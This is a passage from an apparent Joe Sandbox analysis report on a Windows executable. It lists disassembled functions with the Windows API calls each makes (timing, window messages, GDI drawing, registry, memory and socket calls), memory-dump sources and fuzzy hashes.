    • Opcode Fuzzy Hash: d1d14ae53aa78bae1af3b6ab8c3683c0764a42523812b5c117524c5cd894f932
    • Instruction Fuzzy Hash: 4D41EF35800509FFDB118F68CE44BAE7BB4FF49310F1041AEE991B62D1CB799A42CB48
    Function 00417AB2 Relevance: 7.6, APIs: 5, Instructions: 108sleepCOMMON
    Download Yara Rule
    APIs
    • InterlockedIncrement.KERNEL32(004783F4), ref: 00417ADC
    • InterlockedDecrement.KERNEL32(004783F4), ref: 00417AED
    • Sleep.KERNEL32(0000000A,?,?), ref: 00417AF5
    • InterlockedIncrement.KERNEL32(004783F4), ref: 00417AFC
    • InterlockedDecrement.KERNEL32(004783F4), ref: 00417BF6
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Interlocked$DecrementIncrement$Sleep
    • String ID:
    • API String ID: 327565842-0
    • Opcode ID: 90fc57a381e00715e35afd465dc5a8ff7c57ea430ae1844c7da5232fb6eedf94
    • Instruction ID: e540b121462b817b5aae6ec427a49763a98f73807a2fb50418b342084706f20a
    • Opcode Fuzzy Hash: 90fc57a381e00715e35afd465dc5a8ff7c57ea430ae1844c7da5232fb6eedf94
    • Instruction Fuzzy Hash: FE41AF32804106DFDB04DF68DD45AEE73B4EF44349B11402EE919A7262DB39AE85CBD8
    Function 0044C70C Relevance: 7.6, APIs: 5, Instructions: 99COMMON
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00420EA3,000000FF,?,00000028,00000000,004184C3,00000000,?,?,0044C82E,?,?,?,?), ref: 0044C771
    • GetLastError.KERNEL32(?,?,0044C82E,?,?,?,?,00449209,004184C3,?,00000028,00420EA3,?,004783F4,00000000), ref: 0044C77B
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00420EA3,00420EA3,?,00000028,?,?,0044C82E,?,?,?,?,00449209,004184C3,?), ref: 0044C7D0
    • _strlen.LIBCMT ref: 0044C7E3
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00420EA3,000000FF,00000000,00000000,00000000,004184C3,00000000,?,?,0044C82E,?,?,?,?), ref: 0044C7F7
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide$ErrorLast_strlen
    • String ID:
    • API String ID: 1602738612-0
    • Opcode ID: eba79e8160cde25b70985ce8e81dd59c05e2ed59557b5e24ec2982564c7b595c
    • Instruction ID: a058c07e26b641bbfc192da87883db441c84c92e3ac80c53c66dc71070b0c3ca
    • Opcode Fuzzy Hash: eba79e8160cde25b70985ce8e81dd59c05e2ed59557b5e24ec2982564c7b595c
    • Instruction Fuzzy Hash: 3031037060221AAFFB619F25CCC4A7B7B65FF01765F284126F551962A1C378CC50DBA8
    Function 00401CA6 Relevance: 7.6, APIs: 5, Instructions: 98sleepwindowCOMMON
    Download Yara Rule
    APIs
    • GetWindowRect.USER32(?,?), ref: 00401CC7
    • PostMessageW.USER32(00000203,00000201,?), ref: 00401D88
    • Sleep.KERNEL32(00000000), ref: 00401D8C
    • PostMessageW.USER32(00000203,00000202,00000000), ref: 00401D99
    • Sleep.KERNEL32(00000000), ref: 00401D9D
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessagePostSleep$RectWindow
    • String ID:
    • API String ID: 3382505437-0
    • Opcode ID: 7fbab86b68605c3689304c4830e95d246c56bc5e426fb2400a3c8aeb11d6a3b5
    • Instruction ID: 3497ea4d360e579767fbcf44d23d4e2b7884bdb53c7986785f295a9f05f9fe14
    • Opcode Fuzzy Hash: 7fbab86b68605c3689304c4830e95d246c56bc5e426fb2400a3c8aeb11d6a3b5
    • Instruction Fuzzy Hash: 81317271900219EFDF00CFA9C848ADE7BB5FF44324F11862AE824A72E0D778AA01DF54
    Function 0044D99A Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0044D9B4
    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0044D9C5
    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0044DA0B
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0044DA49
    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0044DA6F
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Virtual$Query$AllocInfoProtectSystem
    • String ID:
    • API String ID: 4136887677-0
    • Opcode ID: ae6ea2ce9625b5d9243576e5acae3eff5b06cd8a5d1243a26a370bc1459a2c0c
    • Instruction ID: a43d628128a8e04a91b8abd909b70af1ccdebefb45351d68ac4c75b7ee95a1d4
    • Opcode Fuzzy Hash: ae6ea2ce9625b5d9243576e5acae3eff5b06cd8a5d1243a26a370bc1459a2c0c
    • Instruction Fuzzy Hash: C131BF72D04219EBEF10CFA4DD49AEE7BB8EB08355F140566E901F7290DB788E40DB98
    Function 00406CF6 Relevance: 7.6, APIs: 5, Instructions: 86windowCOMMON
    Download Yara Rule
    APIs
    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00406D5C
    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00406D6D
    • DestroyCursor.USER32(?), ref: 00406D83
    • SendMessageW.USER32(?,00000080,00000000,?), ref: 00406D9B
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00406DCB
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CursorDestroyExtractIconImageInvalidateLoadMessageRectSend
    • String ID:
    • API String ID: 3808587923-0
    • Opcode ID: 58a4df57d53d1c663b160e34bb55d6668459c17e614b0acdf48c3c74ff7a8c10
    • Instruction ID: c21ef0cf77d829efdd81d2e82e102ae9a9487c8db7f6a13140ca5d1279e7c5bd
    • Opcode Fuzzy Hash: 58a4df57d53d1c663b160e34bb55d6668459c17e614b0acdf48c3c74ff7a8c10
    • Instruction Fuzzy Hash: D0317C71600249FFCF11DF64DC849AA7BB9FF04355B11853AF916A6290D339EDA0CB98
    Function 0043C147 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
    Download Yara Rule
    APIs
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 0043C178
    • RegOpenKeyExW.ADVAPI32(000000FF,?,00000000,00000000,?), ref: 0043C1A5
    • RegCloseKey.ADVAPI32(?), ref: 0043C1BE
    • RegDeleteKeyW.ADVAPI32(000000FF,?), ref: 0043C1D3
    • RegEnumKeyExW.ADVAPI32(000000FF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0043C1FA
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Enum$CloseDeleteOpen
    • String ID:
    • API String ID: 2095303065-0
    • Opcode ID: 21ec9ad9b76e8ad65cf264998aa480fb6b0f153335c2455365767b880b5fc71f
    • Instruction ID: 7f2e3d05637b22c96f89e951353aa8dcb6cce75fb7abe0967204a5d51aea3fe2
    • Opcode Fuzzy Hash: 21ec9ad9b76e8ad65cf264998aa480fb6b0f153335c2455365767b880b5fc71f
    • Instruction Fuzzy Hash: 0B2138B290021CBEEF119BD4DC84DEF7BBCEB08344F1044A3E915E2151E2359E88ABB5
    Function 0040CCF8 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • DeleteObject.GDI32(?), ref: 0040CD3D
    • ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
    • SelectObject.GDI32(?,00000000), ref: 0040CD94
    • BeginPath.GDI32(?), ref: 0040CDAE
    • SelectObject.GDI32(?,00000000), ref: 0040CDCD
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Object$Select$BeginCreateDeletePath
    • String ID:
    • API String ID: 2338827641-0
    • Opcode ID: a2cbe206f2c3155c35310916aa923ddabcbc7ad77c6c104879e4775da65235ec
    • Instruction ID: 5f1ec3bb34c6c83378939ec44ec0e75b148177ef5afca06314bcc58f4c2b26e1
    • Opcode Fuzzy Hash: a2cbe206f2c3155c35310916aa923ddabcbc7ad77c6c104879e4775da65235ec
    • Instruction Fuzzy Hash: 2C213171500705EFDB249F68D8C45DBBBB9EF54321B508A3AE566A32D0D734A9408B64
    Function 0041553B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
    Download Yara Rule
    APIs
    • GetFileAttributesW.KERNEL32(0041568E,?,?,?,0041568E,?), ref: 00415558
    • GetLastError.KERNEL32(?,?,?,0041568E,?), ref: 00415563
    • CreateDirectoryW.KERNEL32(0041568E,00000000,?,?,?,0041568E,?), ref: 00415577
    • _wcsrchr.LIBCMT ref: 0041558F
    • CreateDirectoryW.KERNEL32(0041568E,00000000,00000000,0041568E,?), ref: 004155C4
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CreateDirectory$AttributesErrorFileLast_wcsrchr
    • String ID:
    • API String ID: 4258345607-0
    • Opcode ID: 4e0752306a51373c970689daa239aa6ea55fb74df0e4200c5fe6ceab478f77c8
    • Instruction ID: 68b5fae6650556f5f289766cde6e66e8d758d6bde98e903a2f07c94c38581993
    • Opcode Fuzzy Hash: 4e0752306a51373c970689daa239aa6ea55fb74df0e4200c5fe6ceab478f77c8
    • Instruction Fuzzy Hash: FE010432042F11F9E62127269C42BFF279F9F93364F60001BF805DA1D6EB2C8D82922D
    Function 0042F316 Relevance: 7.6, APIs: 5, Instructions: 66networkCOMMON
    Download Yara Rule
    APIs
    • socket.WSOCK32(00000002,00000001,00000006,?,00000000,00000000), ref: 0042F363
    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F371
    • connect.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F388
    • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F396
    • closesocket.WSOCK32(00000000,00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F3A5
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorLast$closesocketconnectsocket
    • String ID:
    • API String ID: 2203635173-0
    • Opcode ID: bcc0c9b2420f326353bda6227fe542d88106e93c1212bbe37af0a85f72262368
    • Instruction ID: e9a76509ebc0cdc0cc0ded18a06fd8c0235db7b6e9999a3bcc64bfd8e966fb5a
    • Opcode Fuzzy Hash: bcc0c9b2420f326353bda6227fe542d88106e93c1212bbe37af0a85f72262368
    • Instruction Fuzzy Hash: 5D11E6317001246BDB00FA26DC02AAE6379AF40728FE4417EFC15AB2C2DA28DD47929D
    Function 0040D713 Relevance: 7.6, APIs: 5, Instructions: 56windowCOMMON
    Download Yara Rule
    APIs
    • GetDlgItem.USER32(00000030,?), ref: 0040D722
    • SendMessageW.USER32(00000000,00000087,00000000,00000000), ref: 0040D73E
    • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0040D75F
    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040D76D
    • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 0040D779
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$Item
    • String ID:
    • API String ID: 3888421826-0
    • Opcode ID: 5b60db5229073f6f900d47f214ef1dac36a0b281dc4b7db597711eaa1891977d
    • Instruction ID: d3fe51862c2309d825a2603ef683ba1ebfbd6ccd36099a025a912eeaa0f8b8cd
    • Opcode Fuzzy Hash: 5b60db5229073f6f900d47f214ef1dac36a0b281dc4b7db597711eaa1891977d
    • Instruction Fuzzy Hash: AD01B532A4430ABBE7316AA4DC41F27BB98BF04744F100136BA84776D5E7F5EC154A98
    Function 00415F9F Relevance: 7.6, APIs: 5, Instructions: 54sleepCOMMON
    Download Yara Rule
    APIs
    • QueryPerformanceCounter.KERNEL32(0042018E,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 00415FD1
    • QueryPerformanceFrequency.KERNEL32(00000001,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 00415FDB
    • Sleep.KERNEL32(00000000,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 00415FE3
    • QueryPerformanceCounter.KERNEL32(00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 00415FED
    • Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 0041602B
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: PerformanceQuery$CounterSleep$Frequency
    • String ID:
    • API String ID: 2833360925-0
    • Opcode ID: 156a9a50ae8b932824767fb1cc352828150c381100d1d1f072abcc3b451083d3
    • Instruction ID: a0496099f4671258914814ba49d464bf0d8d7d2263f3373baa9b493c5c5e15e0
    • Opcode Fuzzy Hash: 156a9a50ae8b932824767fb1cc352828150c381100d1d1f072abcc3b451083d3
    • Instruction Fuzzy Hash: 20114C31D04A2EEBCF009BA4ED899EDBF78FB48706F01049AE441A2155DF38D5958759
    Function 00412305 Relevance: 7.6, APIs: 5, Instructions: 51fileCOMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 00412333
    • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 0041234B
    • CloseHandle.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 00412354
    • FreeLibrary.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 0041236E
    • FreeLibrary.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 00412377
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseFreeHandleLibrary$FileUnmapView
    • String ID:
    • API String ID: 1520591543-0
    • Opcode ID: ee261d1f32630aecec2c7b1bcd55743022462c26821aa0ceee38b670e699d694
    • Instruction ID: 5533a16e1b451d4dcc0f1a1567ab867aa15705d93646e9a3881281f64c75d125
    • Opcode Fuzzy Hash: ee261d1f32630aecec2c7b1bcd55743022462c26821aa0ceee38b670e699d694
    • Instruction Fuzzy Hash: 3A01B131600A19BFDE209F74DD44B96B7A8FF00701B14052AFD64E3250D7A8ECA18AA8
    Function 0041255C Relevance: 7.5, APIs: 5, Instructions: 39COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CursorDestroy
    • String ID:
    • API String ID: 1272848555-0
    • Opcode ID: d5352005860e989090d583af45c09cb90acb3b9687f189d7be541a4d722c1722
    • Instruction ID: 5af252f83c0998234af6a32d05166f9f1353af0f655894e23adab3b1f56daafc
    • Opcode Fuzzy Hash: d5352005860e989090d583af45c09cb90acb3b9687f189d7be541a4d722c1722
    • Instruction Fuzzy Hash: 27011671100B889EC761AF79DC40BCABBE4EF48304F114C2AE59EE21A1E7B56A24CF55
    Function 0040E906 Relevance: 7.5, APIs: 5, Instructions: 39windowtimeCOMMON
    Download Yara Rule
    APIs
    • GetDlgItem.USER32(?,000003E9), ref: 0040E917
    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0040E92E
    • MessageBeep.USER32(00000000), ref: 0040E946
    • KillTimer.USER32(?,0000040A), ref: 0040E966
    • EndDialog.USER32(?,00000001), ref: 0040E981
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: BeepDialogItemKillMessageTextTimerWindow
    • String ID:
    • API String ID: 3741023627-0
    • Opcode ID: a1a7b193d133cf5871837c4394eb224d4f8edd8d25a45181610a7fcfba224499
    • Instruction ID: eefd527a5873faa5c6ba46484e8b71b9a847f1d4d4b8dc00e6c15001e6f527b0
    • Opcode Fuzzy Hash: a1a7b193d133cf5871837c4394eb224d4f8edd8d25a45181610a7fcfba224499
    • Instruction Fuzzy Hash: BB018670500709EBEB215B62ED4DF9677B8BB00706F04056AA282A10E1D7B5E895CB59
    Function 0040D6BD Relevance: 7.5, APIs: 5, Instructions: 37windowCOMMON
    Download Yara Rule
    APIs
    • GetWindow.USER32(00000030,00000005), ref: 0040D6D5
    • SendMessageW.USER32(00000000,00000087,00000000,00000000), ref: 0040D6E9
    • GetWindow.USER32(00000000,00000002), ref: 0040D6F6
    • IsWindow.USER32(00000000), ref: 0040D6FB
    • GetDlgCtrlID.USER32(?), ref: 0040D70C
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$CtrlMessageSend
    • String ID:
    • API String ID: 75316347-0
    • Opcode ID: 0e3289aaeed3d6dad4732093dbf9fab04ae24d55cc092ac6ae943d18526d3546
    • Instruction ID: 64ae80fba0dfbd0f8e7b107c93965b29ce3a89bba25f913328f7fd94f1d7797f
    • Opcode Fuzzy Hash: 0e3289aaeed3d6dad4732093dbf9fab04ae24d55cc092ac6ae943d18526d3546
    • Instruction Fuzzy Hash: 50F0BE31B01715FBEA251BA0DC45FAA7B64FB08382F100132E208A21D1FB35DC208A9D
    Function 0040CC87 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • EndPath.GDI32(?), ref: 0040CC99
    • StrokeAndFillPath.GDI32(?,?,0040C5B2,?,?,00000000,00000000,?,?,?,?,00000000,00000001), ref: 0040CCB1
    • StrokePath.GDI32(?), ref: 0040CCBC
